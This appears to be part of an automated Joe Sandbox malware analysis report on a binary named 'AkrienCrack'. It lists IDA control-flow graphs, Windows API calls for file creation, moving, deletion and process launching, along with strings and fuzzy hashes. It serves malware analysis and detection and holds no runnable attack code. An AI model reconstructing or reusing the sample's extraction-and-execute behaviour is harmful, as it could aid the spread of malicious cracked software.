b5c2a6-b5c2ba call b617cb 473->489 476->489 492 b5c1e4-b5c21e 478->492 493 b5c22c-b5c233 478->493 479->473 479->478 480->427 488 b5c109-b5c110 call b635ce 480->488 486 b5c0f3-b5c0f5 481->486 487 b5c0f8-b5c100 call b67168 481->487 486->487 487->480 488->427 507 b5c2c7-b5c318 call b4fe56 call b5a8d0 GetDlgItem SetWindowTextW SendMessageW call b635e9 489->507 508 b5c2bc-b5c2c0 489->508 528 b5c220 492->528 529 b5c222-b5c224 492->529 499 b5c235-b5c24d call b635b3 493->499 500 b5c261-b5c284 call b635b3 * 2 493->500 514 b5c060-b5c06f call b4a4b3 497->514 515 b5bf0b-b5bf1f SetFileAttributesW 497->515 499->500 522 b5c24f-b5c25c call b4fe2e 499->522 500->489 534 b5c286-b5c294 call b4fe2e 500->534 540 b5c31d-b5c321 507->540 508->507 513 b5c2c2-b5c2c4 508->513 513->507 514->427 517 b5bfc5-b5bfd5 GetFileAttributesW 515->517 518 b5bf25-b5bf58 call b4b4f7 call b4b207 call b635b3 515->518 517->497 526 b5bfd7-b5bfe6 DeleteFileW 517->526 549 b5bf6b-b5bf79 call b4b925 518->549 550 b5bf5a-b5bf69 call b635b3 518->550 522->500 526->497 533 b5bfe8-b5bfeb 526->533 528->529 529->493 537 b5bfef-b5c01b call b4400a GetFileAttributesW 533->537 534->489 547 b5bfed-b5bfee 537->547 548 b5c01d-b5c033 MoveFileW 537->548 540->427 544 b5c327-b5c33b SendMessageW 540->544 544->427 547->537 548->497 551 b5c035-b5c03f MoveFileExW 548->551 549->514 556 b5bf7f-b5bfbe call b635b3 call b5f350 549->556 550->549 550->556 551->497 556->517
              APIs
              • __EH_prolog.LIBCMT ref: 00B5BDFA
                • Part of subcall function 00B5AA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00B5AAFE
              • SetWindowTextW.USER32(?,?), ref: 00B5C127
              • _wcsrchr.LIBVCRUNTIME ref: 00B5C2B1
              • GetDlgItem.USER32(?,00000066), ref: 00B5C2EC
              • SetWindowTextW.USER32(00000000,?), ref: 00B5C2FC
              • SendMessageW.USER32(00000000,00000143,00000000,00B8A472), ref: 00B5C30A
              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00B5C335
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
              • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
              • API String ID: 3564274579-312220925
              • Opcode ID: 0bbfacb60b62b5f5afcc6198638077f4a6dd12375028aa0f57536c2bd2d6a0a4
              • Instruction ID: 6091dfff41e6d0f5c13b519f59c71bf213e2f260622f88f03e0f2fa523d8e828
              • Opcode Fuzzy Hash: 0bbfacb60b62b5f5afcc6198638077f4a6dd12375028aa0f57536c2bd2d6a0a4
              • Instruction Fuzzy Hash: BBE14072D04218AADB25DBA4DC45EEA77FDEF18712F0440E6F909E3051EB749B888F50

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 561 b4d341-b4d378 call b5e28c call b5e360 call b615e8 568 b4d37a-b4d3a9 GetModuleFileNameW call b4bc85 call b4fe2e 561->568 569 b4d3ab-b4d3b4 call b4fe56 561->569 572 b4d3b9-b4d3dd call b49619 call b499b0 568->572 569->572 580 b4d7a0-b4d7a6 call b49653 572->580 581 b4d3e3-b4d3eb 572->581 586 b4d7ab-b4d7bb 580->586 583 b4d3ed-b4d405 call b53781 * 2 581->583 584 b4d409-b4d438 call b65a90 * 2 581->584 595 b4d407 583->595 594 b4d43b-b4d43e 584->594 596 b4d444-b4d44a call b49e40 594->596 597 b4d56c-b4d58f call b49d30 call b635d3 594->597 595->584 601 b4d44f-b4d476 call b49bf0 596->601 597->580 606 b4d595-b4d5b0 call b49bf0 597->606 607 b4d535-b4d538 601->607 608 b4d47c-b4d484 601->608 622 b4d5b2-b4d5b7 606->622 623 b4d5b9-b4d5cc call b635d3 606->623 609 b4d53b-b4d55d call b49d30 607->609 611 b4d486-b4d48e 608->611 612 b4d4af-b4d4ba 608->612 609->594 625 b4d563-b4d566 609->625 611->612 617 b4d490-b4d4aa call b65ec0 611->617 614 b4d4e5-b4d4ed 612->614 615 b4d4bc-b4d4c8 612->615 620 b4d4ef-b4d4f7 614->620 621 b4d519-b4d51d 614->621 615->614 619 b4d4ca-b4d4cf 615->619 633 b4d4ac 617->633 634 b4d52b-b4d533 617->634 619->614 626 b4d4d1-b4d4e3 call b65808 619->626 620->621 627 b4d4f9-b4d513 call b65ec0 620->627 621->607 628 b4d51f-b4d522 621->628 629 b4d5f1-b4d5f8 622->629 623->580 639 b4d5d2-b4d5ee call b5137a call b635ce 623->639 625->580 625->597 626->614 644 b4d527 626->644 627->580 627->621 628->608 636 b4d5fc-b4d625 call b4fdfb call b635d3 629->636 637 b4d5fa 629->637 633->612 634->609 651 b4d627-b4d62e call b635ce 636->651 652 b4d633-b4d649 636->652 637->636 639->629 644->634 651->580 653 b4d731-b4d757 call b4ce72 call b635ce * 2 652->653 654 b4d64f-b4d65d 652->654 694 b4d771-b4d79d call b65a90 * 2 653->694 695 b4d759-b4d76f call b53781 * 2 653->695 656 b4d664-b4d669 654->656 659 b4d97c-b4d984 656->659 660 b4d66f-b4d678 656->660 664 b4d98a-b4d98e 659->664 665 b4d72b-b4d72e 659->665 662 b4d684-b4d68b 660->662 663 b4d67a-b4d67e 660->663 667 b4d880-b4d891 call b4fcbf 662->667 668 b4d691-b4d6b6 662->668 663->659 663->662 669 b4d990-b4d996 664->669 670 b4d9de-b4d9e4 664->670 665->653 686 b4d976-b4d979 667->686 687 b4d897-b4d8c0 call b4fe56 call b65885 667->687 674 b4d6b9-b4d6de call b635b3 call b65808 668->674 675 b4d722-b4d725 669->675 676 b4d99c-b4d9a3 669->676 672 b4d9e6-b4d9ec 670->672 673 b4da0a-b4da2a call b4ce72 670->673 672->673 679 b4d9ee-b4d9f4 672->679 698 b4da02-b4da05 673->698 712 b4d6f6 674->712 713 b4d6e0-b4d6ea 674->713 675->656 675->665 682 b4d9a5-b4d9a8 676->682 683 b4d9ca 676->683 679->675 689 b4d9fa-b4da01 679->689 692 b4d9c6-b4d9c8 682->692 693 b4d9aa-b4d9ad 682->693 688 b4d9cc-b4d9d9 683->688 686->659 687->686 721 b4d8c6-b4d93c call b51596 call b4fdfb call b4fdd4 call b4fdfb call b658d9 687->721 688->675 689->698 692->688 700 b4d9c2-b4d9c4 693->700 701 b4d9af-b4d9b2 693->701 694->580 695->694 700->688 706 b4d9b4-b4d9b8 701->706 707 b4d9be-b4d9c0 701->707 706->679 714 b4d9ba-b4d9bc 706->714 707->688 719 b4d6f9-b4d6fd 712->719 713->712 718 b4d6ec-b4d6f4 713->718 714->688 718->719 719->674 720 b4d6ff-b4d706 719->720 722 b4d70c-b4d71a call b4fdfb 720->722 723 b4d7be-b4d7c1 720->723 753 b4d93e-b4d947 721->753 754 b4d94a-b4d95f 721->754 728 b4d71f 722->728 723->667 727 b4d7c7-b4d7ce 723->727 730 b4d7d6-b4d7d7 727->730 731 b4d7d0-b4d7d4 727->731 728->675 730->727 731->730 733 b4d7d9-b4d7e7 731->733 735 b4d808-b4d830 call b51596 733->735 736 b4d7e9-b4d7ec 733->736 743 b4d832-b4d84e call b635e9 735->743 744 b4d853-b4d85b 735->744 737 b4d805 736->737 738 b4d7ee-b4d803 736->738 737->735 738->736 738->737 743->728 747 b4d862-b4d87b call b4dd6b 744->747 748 b4d85d 744->748 747->728 748->747 753->754 756 b4d960-b4d967 754->756 757 b4d973-b4d974 756->757 758 b4d969-b4d96d 756->758 757->756 758->728 758->757
              APIs
              • __EH_prolog.LIBCMT ref: 00B4D346
              • _wcschr.LIBVCRUNTIME ref: 00B4D367
              • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00B4D328,?), ref: 00B4D382
              • __fprintf_l.LIBCMT ref: 00B4D873
                • Part of subcall function 00B5137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00B4B652,00000000,?,?,?,000501F6), ref: 00B51396
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
              • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
              • API String ID: 4184910265-980926923
              • Opcode ID: c7fb1f7cfbbe01e840fcbee6a757c2fc0c16cb3a158c5c25242882854595489a
              • Instruction ID: ebba3890576f3ea213f6fc7bb1f54c40ddc7bc1d4379288f642dcefc0ac3890f
              • Opcode Fuzzy Hash: c7fb1f7cfbbe01e840fcbee6a757c2fc0c16cb3a158c5c25242882854595489a
              • Instruction Fuzzy Hash: 7612A0B1A00219AADF24DFA4DC81BEEB7F5EF14700F1045E9E516A7291EB709F44EB24

              Control-flow Graph

              APIs
                • Part of subcall function 00B5AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B5AC85
                • Part of subcall function 00B5AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B5AC96
                • Part of subcall function 00B5AC74: IsDialogMessageW.USER32(000501F6,?), ref: 00B5ACAA
                • Part of subcall function 00B5AC74: TranslateMessage.USER32(?), ref: 00B5ACB8
                • Part of subcall function 00B5AC74: DispatchMessageW.USER32(?), ref: 00B5ACC2
              • GetDlgItem.USER32(00000068,00B9ECB0), ref: 00B5CB6E
              • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,00B5A632,00000001,?,?,00B5AECB,00B74F88,00B9ECB0), ref: 00B5CB96
              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00B5CBA1
              • SendMessageW.USER32(00000000,000000C2,00000000,00B735B4), ref: 00B5CBAF
              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00B5CBC5
              • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00B5CBDF
              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00B5CC23
              • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00B5CC31
              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00B5CC40
              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00B5CC67
              • SendMessageW.USER32(00000000,000000C2,00000000,00B7431C), ref: 00B5CC76
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
              • String ID: \
              • API String ID: 3569833718-2967466578
              • Opcode ID: a134b00b0a5ae493e015add10fa3caa50b01e174ab081ea507fb75b553845de1
              • Instruction ID: 8a71e56f6138287c342a834cf6528d163ccf50dca3fa8d0ddc6bd25cfa8077b2
              • Opcode Fuzzy Hash: a134b00b0a5ae493e015add10fa3caa50b01e174ab081ea507fb75b553845de1
              • Instruction Fuzzy Hash: D231E071185742AFE311DF24DC4AFAB7FACEB82705F010548FA91972A1DF645908CBB6

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 770 b59e1c-b59e38 FindResourceW 771 b59f2f-b59f32 770->771 772 b59e3e-b59e50 SizeofResource 770->772 773 b59e70-b59e72 772->773 774 b59e52-b59e61 LoadResource 772->774 775 b59f2e 773->775 774->773 776 b59e63-b59e6e LockResource 774->776 775->771 776->773 777 b59e77-b59e8c GlobalAlloc 776->777 778 b59e92-b59e9b GlobalLock 777->778 779 b59f28-b59f2d 777->779 780 b59f21-b59f22 GlobalFree 778->780 781 b59ea1-b59ebf call b5f4b0 778->781 779->775 780->779 785 b59ec1-b59ee3 call b59d7b 781->785 786 b59f1a-b59f1b GlobalUnlock 781->786 785->786 791 b59ee5-b59eed 785->791 786->780 792 b59eef-b59f03 GdipCreateHBITMAPFromBitmap 791->792 793 b59f08-b59f16 791->793 792->793 794 b59f05 792->794 793->786 794->793
              APIs
              • FindResourceW.KERNEL32(00B5AE4D,PNG,?,?,?,00B5AE4D,00000066), ref: 00B59E2E
              • SizeofResource.KERNEL32(00000000,00000000,?,?,?,00B5AE4D,00000066), ref: 00B59E46
              • LoadResource.KERNEL32(00000000,?,?,?,00B5AE4D,00000066), ref: 00B59E59
              • LockResource.KERNEL32(00000000,?,?,?,00B5AE4D,00000066), ref: 00B59E64
              • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00B5AE4D,00000066), ref: 00B59E82
              • GlobalLock.KERNEL32(00000000,?,?,?,?,?,00B5AE4D,00000066), ref: 00B59E93
              • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00B59EFC
              • GlobalUnlock.KERNEL32(00000000), ref: 00B59F1B
              • GlobalFree.KERNEL32(00000000), ref: 00B59F22
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
              • String ID: PNG
              • API String ID: 4097654274-364855578
              • Opcode ID: 3ae1d731c48fd194b92c3b63b8695456366e2649ca9144c291a2b25a1e8eb57e
              • Instruction ID: c265252c4014396a3ddea879c81fecd778dc29d59d5cd90ac006189713a5b7a6
              • Opcode Fuzzy Hash: 3ae1d731c48fd194b92c3b63b8695456366e2649ca9144c291a2b25a1e8eb57e
              • Instruction Fuzzy Hash: 15317071604312ABD7119F25DC48A2BBBE9FF85B52B0405A8FD0AE3260DF71E948DA61

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 796 b5ce22-b5ce3a call b5e360 799 b5ce40-b5ce4c call b635b3 796->799 800 b5d08b-b5d093 796->800 799->800 803 b5ce52-b5ce7a call b5f350 799->803 806 b5ce84-b5ce91 803->806 807 b5ce7c 803->807 808 b5ce95-b5ce9e 806->808 809 b5ce93 806->809 807->806 810 b5ced6 808->810 811 b5cea0-b5cea2 808->811 809->808 813 b5ceda-b5cedd 810->813 812 b5ceaa-b5cead 811->812 814 b5ceb3-b5cebb 812->814 815 b5d03c-b5d041 812->815 816 b5cee4-b5cee6 813->816 817 b5cedf-b5cee2 813->817 818 b5d055-b5d05d 814->818 819 b5cec1-b5cec7 814->819 820 b5d036-b5d03a 815->820 821 b5d043 815->821 822 b5cef9-b5cf0e call b4b493 816->822 823 b5cee8-b5ceef 816->823 817->816 817->822 824 b5d065-b5d06d 818->824 825 b5d05f-b5d061 818->825 819->818 828 b5cecd-b5ced4 819->828 820->815 829 b5d048-b5d04c 820->829 821->829 831 b5cf27-b5cf32 call b4a180 822->831 832 b5cf10-b5cf1d call b517ac 822->832 823->822 826 b5cef1 823->826 824->813 825->824 826->822 828->810 828->812 829->818 838 b5cf34-b5cf4b call b4b239 831->838 839 b5cf4f-b5cf5c ShellExecuteExW 831->839 832->831 837 b5cf1f 832->837 837->831 838->839 841 b5cf62-b5cf6f 839->841 842 b5d08a 839->842 843 b5cf71-b5cf78 841->843 844 b5cf82-b5cf84 841->844 842->800 843->844 846 b5cf7a-b5cf80 843->846 847 b5cf86-b5cf8f 844->847 848 b5cf9b-b5cfba call b5d2e6 844->848 846->844 849 b5cff1-b5cffd CloseHandle 846->849 847->848 857 b5cf91-b5cf99 ShowWindow 847->857 848->849 866 b5cfbc-b5cfc4 848->866 850 b5cfff-b5d00c call b517ac 849->850 851 b5d00e-b5d01c 849->851 850->851 863 b5d072 850->863 855 b5d01e-b5d020 851->855 856 b5d079-b5d07b 851->856 855->856 861 b5d022-b5d028 855->861 856->842 860 b5d07d-b5d07f 856->860 857->848 860->842 864 b5d081-b5d084 ShowWindow 860->864 861->856 865 b5d02a-b5d034 861->865 863->856 864->842 865->856 866->849 867 b5cfc6-b5cfd7 GetExitCodeProcess 866->867 867->849 868 b5cfd9-b5cfe3 867->868 869 b5cfe5 868->869 870 b5cfea 868->870 869->870 870->849
              APIs
              • ShellExecuteExW.SHELL32(?), ref: 00B5CF54
              • ShowWindow.USER32(?,00000000), ref: 00B5CF93
              • GetExitCodeProcess.KERNEL32(?,?), ref: 00B5CFCF
              • CloseHandle.KERNEL32(?), ref: 00B5CFF5
              • ShowWindow.USER32(?,00000001), ref: 00B5D084
                • Part of subcall function 00B517AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00B4BB05,00000000,.exe,?,?,00000800,?,?,00B585DF,?), ref: 00B517C2
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
              • String ID: $.exe$.inf
              • API String ID: 3686203788-2452507128
              • Opcode ID: 5c737508485e425bb63cca0aa077812516f0e9b1e0e54bba5ca6c2d2c0f175c5
              • Instruction ID: 8e191a7846efb9b1cf7a5db5e91b693f7717901bddd7ade7d9d0decd33ffeb0a
              • Opcode Fuzzy Hash: 5c737508485e425bb63cca0aa077812516f0e9b1e0e54bba5ca6c2d2c0f175c5
              • Instruction Fuzzy Hash: E261E1705043809EDB319F24C8117ABBBF6EB85302F0849DAFDC5972A1DBB1998DCB52

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 871 b6a058-b6a071 872 b6a087-b6a08c 871->872 873 b6a073-b6a083 call b6e6ed 871->873 875 b6a08e-b6a096 872->875 876 b6a099-b6a0bd MultiByteToWideChar 872->876 873->872 880 b6a085 873->880 875->876 878 b6a0c3-b6a0cf 876->878 879 b6a250-b6a263 call b5ec4a 876->879 881 b6a123 878->881 882 b6a0d1-b6a0e2 878->882 880->872 884 b6a125-b6a127 881->884 885 b6a0e4-b6a0f3 call b71a30 882->885 886 b6a101-b6a112 call b68518 882->886 889 b6a245 884->889 890 b6a12d-b6a140 MultiByteToWideChar 884->890 885->889 899 b6a0f9-b6a0ff 885->899 886->889 896 b6a118 886->896 894 b6a247-b6a24e call b6a2c0 889->894 890->889 893 b6a146-b6a158 call b6a72c 890->893 901 b6a15d-b6a161 893->901 894->879 900 b6a11e-b6a121 896->900 899->900 900->884 901->889 903 b6a167-b6a16e 901->903 904 b6a170-b6a175 903->904 905 b6a1a8-b6a1b4 903->905 904->894 908 b6a17b-b6a17d 904->908 906 b6a1b6-b6a1c7 905->906 907 b6a200 905->907 909 b6a1e2-b6a1f3 call b68518 906->909 910 b6a1c9-b6a1d8 call b71a30 906->910 911 b6a202-b6a204 907->911 908->889 912 b6a183-b6a19d call b6a72c 908->912 916 b6a23e-b6a244 call b6a2c0 909->916 927 b6a1f5 909->927 910->916 925 b6a1da-b6a1e0 910->925 915 b6a206-b6a21f call b6a72c 911->915 911->916 912->894 924 b6a1a3 912->924 915->916 928 b6a221-b6a228 915->928 916->889 924->889 929 b6a1fb-b6a1fe 925->929 927->929 930 b6a264-b6a26a 928->930 931 b6a22a-b6a22b 928->931 929->911 932 b6a22c-b6a23c WideCharToMultiByte 930->932 931->932 932->916 933 b6a26c-b6a273 call b6a2c0 932->933 933->894
              APIs
              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00B64E35,00B64E35,?,?,?,00B6A2A9,00000001,00000001,3FE85006), ref: 00B6A0B2
              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00B6A2A9,00000001,00000001,3FE85006,?,?,?), ref: 00B6A138
              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00B6A232
              • __freea.LIBCMT ref: 00B6A23F
                • Part of subcall function 00B68518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00B6C13D,00000000,?,00B667E2,?,00000008,?,00B689AD,?,?,?), ref: 00B6854A
              • __freea.LIBCMT ref: 00B6A248
              • __freea.LIBCMT ref: 00B6A26D
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: ByteCharMultiWide__freea$AllocateHeap
              • String ID:
              • API String ID: 1414292761-0
              • Opcode ID: cadc6436621575d5dd4dcec55337da18bfcb7df2f9534d68790a807438cfa34a
              • Instruction ID: c7253a4084c4786aa25ebc0e74ef1b7793aabe8d6055ed30af89ee29f7e65565
              • Opcode Fuzzy Hash: cadc6436621575d5dd4dcec55337da18bfcb7df2f9534d68790a807438cfa34a
              • Instruction Fuzzy Hash: A251E072650216AFEF259F64CC91EBB77E9EB41750F1442A8FC15F6140EB39DC40CAA2

              Control-flow Graph

              APIs
                • Part of subcall function 00B50085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B500A0
                • Part of subcall function 00B50085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B4EB86,Crypt32.dll,00000000,00B4EC0A,?,?,00B4EBEC,?,?,?), ref: 00B500C2
              • OleInitialize.OLE32(00000000), ref: 00B5A34E
              • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00B5A385
              • SHGetMalloc.SHELL32(00B88430), ref: 00B5A38F
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
              • String ID: riched20.dll$3To
              • API String ID: 3498096277-2168385784
              • Opcode ID: e5fc4bf739b8d2e6a9fa4e49410e7efddbd8892c9ca9b1b803fb28710e2baf9b
              • Instruction ID: 4dee996c85d2591dbf1e8ab645edcd4c394b7ef6f5b728a6df1ec90ed30134bb
              • Opcode Fuzzy Hash: e5fc4bf739b8d2e6a9fa4e49410e7efddbd8892c9ca9b1b803fb28710e2baf9b
              • Instruction Fuzzy Hash: F6F0FFB1D0020DABCB10AF99D8499EFFBFCEF95701F00419AE914E2251DBB45605CFA1

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 940 b499b0-b499d1 call b5e360 943 b499d3-b499d6 940->943 944 b499dc 940->944 943->944 945 b499d8-b499da 943->945 946 b499de-b499fb 944->946 945->946 947 b49a03-b49a0d 946->947 948 b499fd 946->948 949 b49a12-b49a31 call b470bf 947->949 950 b49a0f 947->950 948->947 953 b49a33 949->953 954 b49a39-b49a57 CreateFileW 949->954 950->949 953->954 955 b49a59-b49a7b GetLastError call b4b66c 954->955 956 b49abb-b49ac0 954->956 965 b49a7d-b49a9f CreateFileW GetLastError 955->965 966 b49aaa-b49aaf 955->966 957 b49ae1-b49af5 956->957 958 b49ac2-b49ac5 956->958 961 b49af7-b49b0f call b4fe56 957->961 962 b49b13-b49b1e 957->962 958->957 960 b49ac7-b49adb SetFileTime 958->960 960->957 961->962 968 b49aa5-b49aa8 965->968 969 b49aa1 965->969 966->956 970 b49ab1 966->970 968->956 968->966 969->968 970->956
              APIs
              • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,00B478AD,?,00000005,?,00000011), ref: 00B49A4C
              • GetLastError.KERNEL32(?,?,00B478AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00B49A59
              • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,00B478AD,?,00000005,?), ref: 00B49A8E
              • GetLastError.KERNEL32(?,?,00B478AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00B49A96
              • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00B478AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00B49ADB
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
